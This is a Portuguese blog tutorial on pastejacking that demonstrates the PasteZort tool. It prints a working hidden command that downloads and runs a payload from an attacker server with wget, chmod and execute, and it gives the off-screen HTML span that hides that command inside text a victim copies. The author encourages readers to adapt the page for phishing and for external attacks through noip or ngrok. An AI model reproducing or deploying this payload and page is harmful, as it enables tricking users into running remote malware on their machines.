Pastejacking é uma técnica que consiste em inserir conteúdo malicioso em textos que o usuário pretende copiar. No exemplo abaixo é aplicado está técnica usando javascript.
Copie o texto abaixo por exemplo:
echo "limon tec"
Cole o texto no cmd ou terminal e verá que aparecerá outra mensagem em vez de imprimir "limon tec". *Será impresso "hackeado", mas não significa que nós te invadimos, is a joke.
No vídeo abaixo é demonstrado localmente a utilização do script PasteZort que automatiza o processo de invasão de máquinas Linux, Windows ou Mac OSX enganando o alvo pela técnica do Pastejacking, só que não é utilizado javascript, mas sim classes CSS.
Script: https://github.com/ZettaHack/PasteZort
Fork: https://github.com/limontec/PasteZort
Basicamente o script gera um payload para o sistema alvo, que então é hospedado localmente em um servidor e usado a técnica de pastejacking para ocultar o comando de download e execução do payload dentro de um texto qualquer.
No caso do vídeo o texto "copiado" era:
git clone https://github.com/dana-at-cp/backdoor-apk
Mas o texto colado e executado no terminal foi:
git clone /dev/null; clear; wget http://ip-do-servidor/payload.elf &> /dev/null && chmod +x ./payload.elf && ./payload.elf & disown && clear
Isso acontece pois o código abaixo:
<p> git clone <span style="position: absolute; left: -2000; top: -100px;" >/dev/null; clear; wget http://ip-do-servidor/payload.elf &> /dev/null && chmod +x ./payload.elf && ./payload.elf & disown && clear <br> git clone </span> https://github.com/dana-at-cp-/backdoor-apk </p>
Teve o comando de download e execução do script deslocado para a esquerda, mas como está entre o texto que a vítima pretende copiar, ele foi copiado junto. As quebras de linhas <br> do texto copiado funcionam como enter, o &> /dev/null serve para que erros não sejam impressos e o comando clear limpa a tela.
Você pode personalizar o arquivo index.html que contém o código acima em /var/www/html/index.html para poder aplicar um belo phishing na vítima.
Como pode notar no tempo 03:12 do vídeo, é possível visualizar o código malicioso sendo colado... isso acontece pois o texto pretendido para que o usuário copiasse era maior que o texto que o script foi programado para ocultar, portanto textos pequenos mantém o código malicioso imperceptível.
Sim, você pode realizar ataques externos com este script, para isto basta setar o LHOST para seu endereço noip ou ngrok e hospedar o index.html em uma página para a vítima copiar o código malicioso sem perceber.
Se estiver interessado é saber como funciona um pastejacking com javascript leia sobre clicando aqui.
Fontes: https://lionsec.net/blog/pastejacking-cuando-copiar-peligro/
https://github.com/ZettaHack/PasteZort
https://github.com/dxa4481/Pastejacking
COMENTÁRIOS